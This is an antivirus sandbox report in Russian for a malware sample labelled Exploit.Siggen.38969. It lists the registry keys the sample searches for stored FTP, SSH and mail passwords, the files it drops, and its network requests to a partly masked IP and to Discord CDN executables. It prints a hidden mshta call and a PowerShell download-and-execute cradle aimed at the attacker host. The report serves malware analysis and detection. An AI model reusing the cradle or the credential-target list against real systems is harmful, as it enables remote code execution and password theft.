Exploit.Siggen.38969

Для обеспечения автозапуска и распространения

Создает или изменяет следующие файлы

Вредоносные функции

Загружает файлы и запускает на исполнение.

Запускает на исполнение (эксплоит)

Внедряет код в

следующие системные процессы:

Завершает или пытается завершить

следующие системные процессы:

Ищет ветки реестра, отвечающие за хранение паролей сторонними программами

[<HKCU>\Software\LinasFTP\Site Manager]
[<HKCU>\Software\FlashPeak\BlazeFtp\Settings]
[<HKCU>\Software\Ghisler\Total Commander]
[<HKCU>\Software\Far\Plugins\FTP\Hosts]
[<HKCU>\Software\Far2\Plugins\FTP\Hosts]
[<HKCU>\Software\VanDyke\SecureFX]
[<HKLM>\Software\Wow6432Node\NCH Software\Fling\Accounts]
[<HKCU>\Software\NCH Software\Fling\Accounts]
[<HKLM>\Software\Wow6432Node\NCH Software\ClassicFTP\FTPAccounts]
[<HKCU>\Software\NCH Software\ClassicFTP\FTPAccounts]
[<HKCU>\Software\SimonTatham\PuTTY\Sessions]
[<HKLM>\Software\Wow6432Node\SimonTatham\PuTTY\Sessions]
[<HKCU>\Software\Martin Prikryl]
[<HKLM>\Software\Wow6432Node\Martin Prikryl]
[<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]

Читает файлы, отвечающие за хранение паролей сторонними программами

Изменения в файловой системе

Создает следующие файлы

C:\users\public\eskt.exe
%TEMP%\dipody.dll
%APPDATA%\yv1lpwi.exe
%APPDATA%\e6f983\35a09b.exe
%APPDATA%\e6f983\35a09b.lck
%APPDATA%\e6f983\35a09b.hdb
%LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
%TEMP%\nsfc45c.tmp\vivo.dll
%TEMP%\nsfc45c.tmp\system.dll
%TEMP%\hydroquinone.dll
%TEMP%\psychochemical
%TEMP%\mainform.cs
%TEMP%\modulesdisplay.resx
%TEMP%\bdadotnetarch1505.gif
%TEMP%\pr07.png
%TEMP%\655.26
%TEMP%\permcalc.exe
%TEMP%\nsa289f.tmp\system.dll
%TEMP%\nsa289f.tmp\vivo.dll

Присваивает атрибут 'скрытый' для следующих файлов

Удаляет следующие файлы

Подменяет следующие файлы

%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1960123792-2022915161-3775307078-1001\f58155b4b1d5a524ca0261c3ee99fb50_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee

Сетевая активность

TCP

Запросы HTTP GET

http://18#.##1.209.47:1010/hta via 18#.#61.209.47
http://18#.##1.209.47:1010/get via 18#.#61.209.47
http://cd#.##scordapp.com/attachments/630911118843576320/643314255852077056/binfb1.exe
http://cd#.##scordapp.com/attachments/630911118843576320/643361774929969173/bbuild1.exe

Запросы HTTP POST

'cd#.##scordapp.com':443

UDP

Другое

Создает и запускает на исполнение

'C:\users\public\eskt.exe'
'%APPDATA%\yv1lpwi.exe'
'%WINDIR%\syswow64\mshta.exe' http://18#.##1.209.47:1010/hta &AAAAAAC' (со скрытым окном)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://18#....' (со скрытым окном)
'%APPDATA%\yv1lpwi.exe' ' (со скрытым окном)

Запускает на исполнение